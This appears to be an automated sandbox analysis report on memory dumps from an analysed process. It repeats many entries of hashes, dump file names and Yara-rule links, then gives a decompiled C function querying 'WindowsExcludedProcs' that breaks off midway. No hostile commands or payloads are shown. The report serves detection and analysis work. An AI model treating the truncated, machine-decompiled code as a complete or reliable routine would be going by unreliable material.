Function 02590060, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E

Uniqueness

Uniqueness Score: -1.00%

Function 025910D0, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446

Uniqueness

Uniqueness Score: -1.00%

Function 02591148, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A

Uniqueness

Uniqueness Score: -1.00%

Function 0259010C, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846

Uniqueness

Uniqueness Score: -1.00%

Function 025901D4, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96

Uniqueness

Uniqueness Score: -1.00%

Function 0258FA50, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 0258FA20, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A

Uniqueness

Uniqueness Score: -1.00%

Function 0258FAB8, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996

Uniqueness

Uniqueness Score: -1.00%

Function 0258FB50, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 0258FBE8, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986

Uniqueness

Uniqueness Score: -1.00%

Function 0258F8CC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697

Uniqueness

Uniqueness Score: -1.00%

Function 0258F900, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 0258F938, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947

Uniqueness

Uniqueness Score: -1.00%

Function 02591930, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546

Uniqueness

Uniqueness Score: -1.00%

Function 0258FE24, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456

Uniqueness

Uniqueness Score: -1.00%

Function 0258FEA0, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556

Uniqueness

Uniqueness Score: -1.00%

Function 0258FF34, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A

Uniqueness

Uniqueness Score: -1.00%

Function 0258FFFC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B

Uniqueness

Uniqueness Score: -1.00%

Function 0258FC48, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456

Uniqueness

Uniqueness Score: -1.00%

Function 02590C40, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547

Uniqueness

Uniqueness Score: -1.00%

Function 0258FC30, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 0258FC90, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546

Uniqueness

Uniqueness Score: -1.00%

Function 025B8788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E025B8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E025B8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0259E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
